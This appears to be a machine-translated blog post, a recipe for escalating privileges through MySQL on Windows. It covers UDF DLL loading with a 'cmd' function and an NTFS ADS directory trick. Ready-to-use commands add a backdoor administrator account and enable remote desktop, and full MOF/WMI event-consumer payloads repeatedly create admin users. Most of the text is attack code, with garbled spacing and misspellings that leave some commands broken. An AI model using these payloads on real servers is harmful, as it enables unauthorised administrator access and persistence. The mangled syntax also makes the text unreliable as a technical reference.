MySQL right to mention

1. Using Sqlmap's UDF to extract rights

1. Find a writable directory to upload Lib_mysqludf_sys.dll, according to the version of MySQL to import into the Windows\System32 or MySQL \lib\plugin directory

Select @ @plugin_dir

Select load_flie ('c:\\recycler\\lib_mysqludf_sys.dll'into'  c:\\windows\\system32\\lib_mysqludf_sys.dll'

2. Create a function Execution command

Create functionCmdreturnsString soname'Lib_mysqludf_sys.dll';Selectcmd'net user mrxt 123456/add');Selectcmd'net localgroup Administrators Mrxt/add');Selectcmd'regedit/s C:\\3389.reg'); Drop functioncmd;Delete  fromMysql.funcwhereName='cmd'

　　

3. In some cases, when encountering the can ' t open shared library, you need to export the DLL to the Lib\plugin directory, and if it does not exist, you can use the NTFS ads stream to create a folder method

Select 'DLL File'  intoDumpFile'C:\\Program Files\\mysql\\mysql Server 5.1\\lib\\:: $INDEX _allocation';//create a Lib directorySelect 'DLL File'  intoDumpFile'C:\\Program Files\\mysql\\mysql Server 5.1\\lib\\plugin:: $INDEX _allocation';//Create a plugin directory

　　

2.MOF right to lift

Find a writable directory to upload MOF files, such as C:\RECYCLER\

This payload is using Wscript.Shell.

#pragma namespace ("\\\\.\\root\\subscription") instance of__EventFilter as$EventFilter {eventnamespace="Root\\cimv2"; Name="FiltP2"; Query="Select *  from__instancemodificationevent ""Wheretargetinstance Isa \ "win32_localtime\ " "" andTargetinstance.second= 5"; QueryLanguage="WQL";}; Instance ofActivescripteventconsumer as$Consumer {Name="ConsPCSV2"; Scriptingengine="JScript"; ScriptText=    "varWSH=New ActiveXObject (\ "Wscript.shell\") \nwsh.run (\ "Net.exeUserMrxt123456 /Add\")";}; Instance of__filtertoconsumerbinding{Consumer=$Consumer; Filter=$EventFilter;};

This payload is using User.shell.

#pragma namespace ("\\\\.\\root\\subscription") instance of__EventFilter as$EventFilter {eventnamespace="Root\\cimv2"; Name="FiltP2"; Query="Select *  from__instancemodificationevent ""Wheretargetinstance Isa \ "win32_localtime\ " "" andTargetinstance.second= 5"; QueryLanguage="WQL";}; Instance ofActivescripteventconsumer as$Consumer {Name="ConsPCSV2"; Scriptingengine="JScript"; ScriptText="varWSH=New ActiveXObject (\ "Shell.users\") \nz=WSH.Create(\ "Newuser\") \nz.changepassword (\ "123456\ ", \" \ ") \nz.setting (\" Accounttype\ ")=3";}; Instance of__filtertoconsumerbinding{Consumer=$Consumer; Filter=$EventFilter;};

Then export to the c:/windows/system32/wbem/mof/directory

Select load_file ('c:\\wmpub\\nullevt.mof'into'c:\\ Windows\\system32\\wbem\\mof\\nullevt.mof'

This method will continue to add users, execute net stop winmgmt and then delete files to

Reference article:

Http://www.waitalone.cn/mysql-tiquan-summary.html

http://zone.wooyun.org/content/1795

http://www.exploit-db.com/exploits/23083/

MySQL right to mention